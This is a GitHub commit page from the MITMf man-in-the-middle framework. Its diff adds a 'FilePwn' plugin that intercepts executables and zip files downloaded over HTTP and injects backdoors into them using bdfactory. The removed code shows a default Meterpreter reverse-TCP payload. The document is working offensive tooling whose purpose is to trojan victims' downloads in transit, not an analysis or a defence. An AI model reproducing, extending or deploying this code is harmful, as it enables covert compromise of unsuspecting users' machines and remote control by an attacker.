github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-07 13:32:18 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

filepwn plugin intial commit

Browse source
This commit is contained in:
byt3bl33d3r 2014-07-12 17:18:32 +02:00
parent 5c2e88cd4f
commit 8dc515d999
2 changed files with 37 additions and 31 deletions
Download patch file Download diff file Expand all files Collapse all files

2
.gitignore vendored
View file

@ -1,3 +1,3 @@
*.pyc *.pyc
/plugins/old_plugins/ /plugins/old_plugins/
bdfactory.cfg backdoored/

66
plugins/FilePwn.py
View file

@ -1,33 +1,33 @@
################################################################################################ ################################################################################################
# 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy # 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy
# #
# This is just a test to see if i can actually implement it correctly!! NOT THE FINAL VERSION!!!! # This is just a test to see if i can actually implement it correctly!! STILL WORK IN PROGRESS!!!!
################################################################################################# #################################################################################################
import sys, os import sys, os
import pefile import pefile
import zipfile import zipfile
import logging import logging
import json
import shutil import shutil
import requests
import random
import string
from bdfactory import pebin, elfbin from bdfactory import pebin, elfbin
from plugins.plugin import Plugin from plugins.plugin import Plugin
from tempfile import mkstemp from tempfile import mkstemp
try:
# for now lets not read from a config file from configobj import ConfigObj
#try: except:
#from configobj import ConfigObj sys.exit('[-] configobj not installed!')
#except:
#sys.exit('[-] configobj not installed!')
class FilePwn(Plugin): class FilePwn(Plugin):
name = "FilePwn" name = "FilePwn"
optname = "filepwn" optname = "filepwn"
implements = ["handleResponse"] implements = ["handleResponse"]
has_opts = True has_opts = False
log_level = logging.DEBUG log_level = logging.DEBUG
desc = "Backdoor executables being sent over http using bdfactory (STILL WORK IN PROGRESS!!)" desc = "Backdoor executables being sent over http using bdfactory"
def convert_to_Bool(self, aString): def convert_to_Bool(self, aString):
if aString.lower() == 'true': if aString.lower() == 'true':
@ -39,17 +39,27 @@ class FilePwn(Plugin):
def initialize(self,options): def initialize(self,options):
'''Called if plugin is enabled, passed the options namespace''' '''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
'application/x-msdos-program', 'binary/octet-stream'] 'application/x-msdos-program', 'binary/octet-stream']
#FOR FUTURE USE #FOR FUTURE USE
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip'] self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
#USED NOW #NOT USED NOW
self.supportedBins = ('MZ', '7f454c46'.decode('hex')) #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
self.options = options self.userConfig = ConfigObj('filepwn.cfg')
#userConfig = ConfigObj('bdfproxy.cfg') self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
self.zipblacklist = self.userConfig['ZIP']['blacklist']
print "[*] %s plugin online" % self.name
def binaryGrinder(self, binaryFile): def binaryGrinder(self, binaryFile):
""" """
@ -155,7 +165,7 @@ class FilePwn(Plugin):
logging.warning("EXCEPTION IN binaryGrinder %s", str(e)) logging.warning("EXCEPTION IN binaryGrinder %s", str(e))
return None return None
def zip_files(self, aZipFile): def zipGrinder(self, aZipFile):
"When called will unpack and edit a Zip File and return a zip file" "When called will unpack and edit a Zip File and return a zip file"
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB' print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
@ -200,7 +210,6 @@ class FilePwn(Plugin):
if os.path.isdir(tmpDir + '/' + info.filename) is True: if os.path.isdir(tmpDir + '/' + info.filename) is True:
print info.filename, 'is a directory' print info.filename, 'is a directory'
continue continue
#Check against keywords #Check against keywords
keywordCheck = False keywordCheck = False
@ -264,19 +273,16 @@ class FilePwn(Plugin):
content_header = request.client.headers['Content-Type'] content_header = request.client.headers['Content-Type']
if content_header in self.binaryMimeTypes: if content_header in self.zipMimeTypes:
orig_binary = request.content.read() print "[+] Detected supported zip file type!"
bd_binary = self.binaryGrinder(orig_binary) bd_zip = self.zipGrinder(data)
return {'request':request,'data':bd_binary}
elif content_header in self.zipMimeTypes:
orig_zipfile = request.content.read()
bd_zip = self.zip_files(orig_zipfile)
return {'request':request,'data':bd_zip} return {'request':request,'data':bd_zip}
else:
return
def add_options(self,options): elif content_header in self.binaryMimeTypes:
options.add_argument("--msf-file-payload",type=str,default="windows/meterpreter/reverse_tcp", print "[+] Detected supported binary type!"
help="Payload you want to use (default: windows/meterpreter/reverse_tcp)") bd_binary = self.binaryGrinder(data)
return {'request':request,'data':bd_binary}
else:
print "[-] File is not of supported Content-Type: %s" % content_header
return {'request':request,'data':data}